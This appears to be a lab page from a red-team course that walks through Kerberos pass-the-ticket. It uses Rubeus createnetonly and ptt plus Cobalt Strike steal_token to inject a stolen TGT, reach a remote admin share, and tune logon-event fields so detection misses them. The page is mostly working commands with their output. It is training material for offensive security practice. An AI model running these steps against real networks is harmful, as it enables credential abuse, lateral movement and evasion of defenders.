Pass the Ticket
Pass the ticket is a technique that allows you to add Kerberos tickets to an existing logon session (LUID) that you have access to, or a new one you create. Accessing a remote resource will then allow that authentication to happen via Kerberos.
For this, we can leverage the TGT we extracted from jking's logon session on Workstation 2.
The first step is to create a blank, "sacrificial" logon session that we can pass the TGT into. We do this because a logon session can only hold a single TGT at a time. If we passed jking's TGT into the LUID for bfarmer, it would erase bfarmer's TGT and cause all sorts of authentication issues for the user.
Creating a new logon session and passing tickets into sessions other than your own requires elevated privileges.
\
Rubeus' createnetonly command will start a new hidden process of our choosing, using the CreateProcessWithLogonW API.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : False
[*] Username : GJB9A2GP
[*] Domain : VPY1XQRP
[*] Password : R4ABN1K3
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4748
[+] LUID : 0x798c2c\
This also creates a new LUID. It will have no tickets inside, so won't be visible with triage just yet. The next step is to pass the TGT into this new LUID using the Rubeus ptt command. Where the /luid is the new LUID we just created and /ticket is the base64 encoded ticket we previously extracted.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
[*] Action: Import Ticket
[*] Target LUID: 0x798c2c
[+] Ticket successfully imported!\
Rubeus triage will now show jking's TGT inside this LUID.
| 0x798c2c | jking @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:29:20 PM |\
The final step is to impersonate the process that we created with createnetonly using Cobalt Strike's steal_token command. At a minimum, this requires the PID of the target process, which in this example, is 4748. We'll then be able to access the remote machine.
beacon> steal_token 4748
beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 18:50:13 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 18:58:09 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 11:02:25 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 08/31/2022 17:40:32 ProgramData
dir 08/15/2022 18:31:08 Recovery
dir 08/30/2022 11:16:24 System Volume Information
dir 08/30/2022 17:51:08 Users
dir 08/30/2022 20:19:27 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/01/2022 07:26:41 DumpStack.log.tmp
384mb fil 09/01/2022 07:26:41 pagefile.sys\
As before, use rev2self to drop the impersonation. To destroy the logon session we created, simply kill the process with the kill command.
beacon> rev2self
beacon> kill 4748\
Rubeus triage will no longer show the logon session.
\
OPSEC By default, Rubeus will use a random username, domain and password with CreateProcessWithLogonW, which will appear in the associated 4624 logon event. The "Suspicious Logon Events" saved search will show 4624's where the TargetOutboundDomainName is not an expected value.
\
\
We can provide these options on the command line to make the fields appear less anomalous. The password does not have to be the users' actual password.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123Last updated